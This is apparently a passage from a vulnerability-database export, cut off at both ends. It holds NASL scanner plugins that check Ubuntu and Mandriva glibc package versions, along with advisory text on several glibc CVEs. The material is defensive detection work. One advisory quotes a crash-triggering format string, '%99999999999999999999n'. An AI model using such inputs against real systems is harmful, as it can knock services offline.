security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.3.6-0ubuntu20.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.3.6-0ubuntu20.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.3.6-0ubuntu20.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.3.6-0ubuntu20.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.3.6-0ubuntu20.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.3.6-0ubuntu20.6\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.11.1-0ubuntu7.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.9-4ubuntu6.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.9-4ubuntu6.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.9-4ubuntu6.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.9-4ubuntu6.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.9-4ubuntu6.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.9-4ubuntu6.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.9-4ubuntu6.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.9-4ubuntu6.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.9-4ubuntu6.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.9-4ubuntu6.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.9-4ubuntu6.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"glibc-source\", ver:\"2.9-4ubuntu6.2\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.7-10ubuntu6\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.7-10ubuntu6\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.7-10ubuntu6\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.7-10ubuntu6\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.7-10ubuntu6\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.7-10ubuntu6\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.7-10ubuntu6\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.7-10ubuntu6\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.7-10ubuntu6\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.7-10ubuntu6\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.7-10ubuntu6\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"glibc-source\", ver:\"2.7-10ubuntu6\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-07T11:52:42", "description": "Multiple vulnerabilities was discovered and fixed in glibc :\n\nMultiple integer overflows in the strfmon implementation in the GNU C\nLibrary (aka glibc or libc6) 2.10.1 and earlier allow\ncontext-dependent attackers to cause a denial of service (memory\nconsumption or application crash) via a crafted format string, as\ndemonstrated by a crafted first argument to the money_format function\nin PHP, a related issue to CVE-2008-1391 (CVE-2009-4880).\n\nnis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7\nand Embedded GLIBC (EGLIBC) 2.10.2 adds information from the\npasswd.adjunct.byname map to entries in the passwd map, which allows\nremote attackers to obtain the encrypted passwords of NIS accounts by\ncalling the getpwnam function (CVE-2010-0015).\n\nThe encode_name macro in misc/mntent_r.c in the GNU C Library (aka\nglibc or libc6) 2.11.1 and earlier, as used by ncpmount and\nmount.cifs, does not properly handle newline characters in mountpoint\nnames, which allows local users to cause a denial of service (mtab\ncorruption), or possibly modify mount options and gain privileges, via\na crafted mount request (CVE-2010-0296).\n\nInteger signedness error in the elf_get_dynamic_info function in\nelf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6)\n2.0.1 through 2.11.1, when the --verify option is used, allows\nuser-assisted remote attackers to execute arbitrary code via a crafted\nELF program with a negative value for a certain d_tag structure member\nin the ELF header (CVE-2010-0830).\n\nThe updated packages have been patched to correct these issues.", "edition": 24, "published": "2010-07-30T00:00:00", "title": "Mandriva Linux Security Advisory : glibc (MDVSA-2010:112)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "modified": "2010-07-30T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:glibc-profile", "p-cpe:/a:mandriva:linux:glibc-static-devel", "p-cpe:/a:mandriva:linux:glibc-doc", "cpe:/o:mandriva:linux:2010.0", "p-cpe:/a:mandriva:linux:nscd", "p-cpe:/a:mandriva:linux:glibc-doc-pdf", "p-cpe:/a:mandriva:linux:glibc-i18ndata", "p-cpe:/a:mandriva:linux:glibc-utils", "p-cpe:/a:mandriva:linux:glibc", "p-cpe:/a:mandriva:linux:glibc-devel"], "id": "MANDRIVA_MDVSA-2010-112.NASL", "href": "https://www.tenable.com/plugins/nessus/48185", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2010:112. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48185);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-4880\", \"CVE-2010-0015\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_bugtraq_id(36443, 37885, 40063);\n script_xref(name:\"MDVSA\", value:\"2010:112\");\n\n script_name(english:\"Mandriva Linux Security Advisory : glibc (MDVSA-2010:112)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities was discovered and fixed in glibc :\n\nMultiple integer overflows in the strfmon implementation in the GNU C\nLibrary (aka glibc or libc6) 2.10.1 and earlier allow\ncontext-dependent attackers to cause a denial of service (memory\nconsumption or application crash) via a crafted format string, as\ndemonstrated by a crafted first argument to the money_format function\nin PHP, a related issue to CVE-2008-1391 (CVE-2009-4880).\n\nnis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7\nand Embedded GLIBC (EGLIBC) 2.10.2 adds information from the\npasswd.adjunct.byname map to entries in the passwd map, which allows\nremote attackers to obtain the encrypted passwords of NIS accounts by\ncalling the getpwnam function (CVE-2010-0015).\n\nThe encode_name macro in misc/mntent_r.c in the GNU C Library (aka\nglibc or libc6) 2.11.1 and earlier, as used by ncpmount and\nmount.cifs, does not properly handle newline characters in mountpoint\nnames, which allows local users to cause a denial of service (mtab\ncorruption), or possibly modify mount options and gain privileges, via\na crafted mount request (CVE-2010-0296).\n\nInteger signedness error in the elf_get_dynamic_info function in\nelf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6)\n2.0.1 through 2.11.1, when the --verify option is used, allows\nuser-assisted remote attackers to execute arbitrary code via a crafted\nELF program with a negative value for a certain d_tag structure member\nin the ELF header (CVE-2010-0830).\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(255);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.0\", reference:\"glibc-2.10.1-6.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"glibc-devel-2.10.1-6.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"glibc-doc-2.10.1-6.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"glibc-doc-pdf-2.10.1-6.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"glibc-i18ndata-2.10.1-6.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"glibc-profile-2.10.1-6.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"glibc-static-devel-2.10.1-6.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"glibc-utils-2.10.1-6.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"nscd-2.10.1-6.5mnb2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:52:42", "description": "Multiple vulnerabilities was discovered and fixed in glibc :\n\nMultiple integer overflows in the strfmon implementation in the GNU C\nLibrary (aka glibc or libc6) 2.10.1 and earlier allow\ncontext-dependent attackers to cause a denial of service (memory\nconsumption or application crash) via a crafted format string, as\ndemonstrated by a crafted first argument to the money_format function\nin PHP, a related issue to CVE-2008-1391 (CVE-2009-4880).\n\nInteger overflow in the __vstrfmon_l function in stdlib/strfmon_l.c in\nthe strfmon implementation in the GNU C Library (aka glibc or libc6)\nbefore 2.10.1 allows context-dependent attackers to cause a denial of\nservice (application crash) via a crafted format string, as\ndemonstrated by the %99999999999999999999n string, a related issue to\nCVE-2008-1391 (CVE-2009-4881).\n\nnis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7\nand Embedded GLIBC (EGLIBC) 2.10.2 adds information from the\npasswd.adjunct.byname map to entries in the passwd map, which allows\nremote attackers to obtain the encrypted passwords of NIS accounts by\ncalling the getpwnam function (CVE-2010-0015).\n\nThe encode_name macro in misc/mntent_r.c in the GNU C Library (aka\nglibc or libc6) 2.11.1 and earlier, as used by ncpmount and\nmount.cifs, does not properly handle newline characters in mountpoint\nnames, which allows local users to cause a denial of service (mtab\ncorruption), or possibly modify mount options and gain privileges, via\na crafted mount request (CVE-2010-0296).\n\nInteger signedness error in the elf_get_dynamic_info function in\nelf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6)\n2.0.1 through 2.11.1, when the --verify option is used, allows\nuser-assisted remote attackers to execute arbitrary code via a crafted\nELF program with a negative value for a certain d_tag structure member\nin the ELF header (CVE-2010-0830).\n\nPackages for 2008.0 and 2009.0 are provided as of the Extended\nMaintenance Program. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149&products_id=4\n90\n\nThe updated packages have been patched to correct these issues.", "edition": 24, "published": "2010-06-09T00:00:00", "title": "Mandriva Linux Security Advisory : glibc (MDVSA-2010:111)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0015", "CVE-2009-4881", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "modified": "2010-06-09T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:glibc-profile", "p-cpe:/a:mandriva:linux:glibc-static-devel", "cpe:/o:mandriva:linux:2009.0", "p-cpe:/a:mandriva:linux:glibc-doc", "cpe:/o:mandriva:linux:2008.0", "cpe:/o:mandriva:linux:2009.1", "p-cpe:/a:mandriva:linux:nscd", "p-cpe:/a:mandriva:linux:glibc-doc-pdf", "p-cpe:/a:mandriva:linux:glibc-i18ndata", "p-cpe:/a:mandriva:linux:glibc-utils", "p-cpe:/a:mandriva:linux:glibc", "p-cpe:/a:mandriva:linux:glibc-devel"], "id": "MANDRIVA_MDVSA-2010-111.NASL", "href": "https://www.tenable.com/plugins/nessus/46849", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2010:111. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(46849);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-4880\", \"CVE-2009-4881\", \"CVE-2010-0015\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_bugtraq_id(36443, 37885, 40063);\n script_xref(name:\"MDVSA\", value:\"2010:111\");\n\n script_name(english:\"Mandriva Linux Security Advisory : glibc (MDVSA-2010:111)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities was discovered and fixed in glibc :\n\nMultiple integer overflows in the strfmon implementation in the GNU C\nLibrary (aka glibc or libc6) 2.10.1 and earlier allow\ncontext-dependent attackers to cause a denial of service (memory\nconsumption or application crash) via a crafted format string, as\ndemonstrated by a crafted first argument to the money_format function\nin PHP, a related issue to CVE-2008-1391 (CVE-2009-4880).\n\nInteger overflow in the __vstrfmon_l function in stdlib/strfmon_l.c in\nthe strfmon implementation in the GNU C Library (aka glibc or libc6)\nbefore 2.10.1 allows context-dependent attackers to cause a denial of\nservice (application crash) via a crafted format string, as\ndemonstrated by the %99999999999999999999n string, a related issue to\nCVE-2008-1391 (CVE-2009-4881).\n\nnis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7\nand Embedded GLIBC (EGLIBC) 2.10.2 adds information from the\npasswd.adjunct.byname map to entries in the passwd map, which allows\nremote attackers to obtain the encrypted passwords of NIS accounts by\ncalling the getpwnam function (CVE-2010-0015).\n\nThe encode_name macro in misc/mntent_r.c in the GNU C Library (aka\nglibc or libc6) 2.11.1 and earlier, as used by ncpmount and\nmount.cifs, does not properly handle newline characters in mountpoint\nnames, which allows local users to cause a denial of service (mtab\ncorruption), or possibly modify mount options and gain privileges, via\na crafted mount request (CVE-2010-0296).\n\nInteger signedness error in the elf_get_dynamic_info function in\nelf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6)\n2.0.1 through 2.11.1, when the --verify option is used, allows\nuser-assisted remote attackers to execute arbitrary code via a crafted\nELF program with a negative value for a certain d_tag structure member\nin the ELF header (CVE-2010-0830).\n\nPackages for 2008.0 and 2009.0 are provided as of the Extended\nMaintenance Program. Please visit this link to learn more:\nhttp://store.mandriva.com/product_info.php?cPath=149&products_id=4\n90\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(255);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"glibc-2.6.1-4.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"glibc-devel-2.6.1-4.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"glibc-doc-2.6.1-4.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"glibc-doc-pdf-2.6.1-4.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"glibc-i18ndata-2.6.1-4.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"glibc-profile-2.6.1-4.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"glibc-static-devel-2.6.1-4.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"glibc-utils-2.6.1-4.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"nscd-2.6.1-4.4mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", reference:\"glibc-2.8-1.20080520.5.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"glibc-devel-2.8-1.20080520.5.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"glibc-doc-2.8-1.20080520.5.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"glibc-doc-pdf-2.8-1.20080520.5.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"glibc-i18ndata-2.8-1.20080520.5.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"glibc-profile-2.8-1.20080520.5.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"glibc-static-devel-2.8-1.20080520.5.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"glibc-utils-2.8-1.20080520.5.5mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"nscd-2.8-1.20080520.5.5mnb2\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", reference:\"glibc-2.9-0.20081113.5.1mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"glibc-devel-2.9-0.20081113.5.1mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"glibc-doc-2.9-0.20081113.5.1mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"glibc-doc-pdf-2.9-0.20081113.5.1mnb2\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"glibc-i18ndata-2.9-0.20081113.5.1mnb2\")) 